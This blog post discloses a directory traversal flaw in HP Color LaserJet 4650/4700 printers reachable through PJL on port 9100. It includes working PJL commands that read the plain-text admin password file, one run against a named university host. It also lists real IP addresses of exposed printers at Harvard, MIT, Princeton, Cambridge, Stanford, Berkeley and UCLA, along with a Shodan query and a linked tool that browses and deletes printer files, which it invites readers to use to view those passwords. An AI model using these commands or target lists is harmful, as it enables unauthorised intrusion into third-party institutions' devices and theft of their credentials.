Vulnerability in HP Color LaserJet 4650 and 4700 printers

Talking about cyber-security, the first thing coming to your mind might be personal computers or server racks, maybe surveillance cameras considering the NSA affair. At least, printers will probably not be the first thing you might think of. However, it is important to not neglect them.

Basics of PJL

PJL is an acronym for printer job language, a protocol developed by Hewlett Packard (HP) in order to provide a simple communication method between a host, usually a personal computer commanded to print a document, and the printer. Being running on port 9100 by default, PJL is not only restricted to HP printers but being used by other printer models as well. The language provides a set of commands, including file system commands to download and upload files remotely from and to the printing device.
A basic PJL session might look like this:

user@client:~$ telnet 192.168.178.100 9100
Trying 192.168.178.100...
Connected to 192.168.178.100.
Escape character is '^]'.
^[%-12345X@PJL
@PJL INFO ID
@PJL INFO ID
"Brother MFC-7840W:8C5-C17:Ver.L"

@PJL ECHO Hello World
@PJL ECHO Hello World

While the INFO command having the parameter ID requests the printer to reply with its model name and version, ECHO has the printer reply with the subsequent message Hello World. This is not too thrilling yet until you are playing around with the file system commands prefixed by FS*. For example, @PJL FSDIRLIST NAME=”0:\” ENTRY=0 COUNT=999 replies with a list of files located on volume 0:\. On most HP printers, this exposes some web server related files to curious eyes. However, what should not happen is that you can escape volume 0:\ by using a double-dot. But this is exactly what you can do and is called directory traversal attack. 0:\..\ reveals the parent directory of volume 0:\ and 0:\..\..\ is sufficient on most HP printers to get access to the root directory of the underlying Unix system.

Open file systems

Open printer file systems allow you to directly upload files to the printer’s web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. Although there is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, it is too complicated for standard or even advanced users who would have to know the PJL specifications in order to set it up. Secondly, a 16-bit PJL password can be successfully brute-forced within hours.

Plain text passwords

Storing plain text passwords is a sin which you are only allowed to commit as an absolute security beginner. You may not practice this technique when you are an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP developers have done. Since you have access to a large part of the Unix file system which only seems to be restricted by native file permissions, you are now allowed to download the file at 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat using the PJL-command FSUPLOAD (PJL commands are named based on the perspective of the printer). Guess what this file consists of. If you read a null-terminated ASCII-string starting at position 0x0c, you will notice that this string contains the web interface administration password.
Just look at the following short PJL session which will fully exploit this vulnerability. This was a session to 164.67.135.16 at the University of Calfornia in Los Angeles and selected as an example because of the highly creative password choice.

^[%-12345X@PJL
@PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
password

Explore printers yourself

PJL ExplorerA web-based PJL exploring tool called PJL Explorer has been developed in order to allow easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system, upload and delete files. To find vulnerable printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on Github.

Universities of Harvard, Princeton and Cambridge affected

Harvard: 140.247.118.185, 140.247.92.198, 128.103.90.40
Massachusetts Institute of Technoloy: 18.115.2.89, 18.116.0.129
Princeton: 128.112.35.10, 128.112.112.112, 128.112.32.43
Cambridge: 131.111.168.138, 131.111.39.27
Stanford University: 171.67.204.34
University of California, Berkeley: 128.32.208.18, 128.32.19.225, 169.229.207.65
University of California, Los Angeles: 128.97.11.33, 164.67.135.16, 128.97.64.72

For legal reasons, passwords are not included in this blog post. To view a printer password, please click one of the above links in order to use the PJL Explorer in order to display the passwords.

View the vulnerability report which I have sent to Hewlett Packard. According to the reply of HP, two security bulletins have already been published, one in 2010 and another one in 2013.

Bookmark the permalink.

Leave a Reply

Your email address will not be published.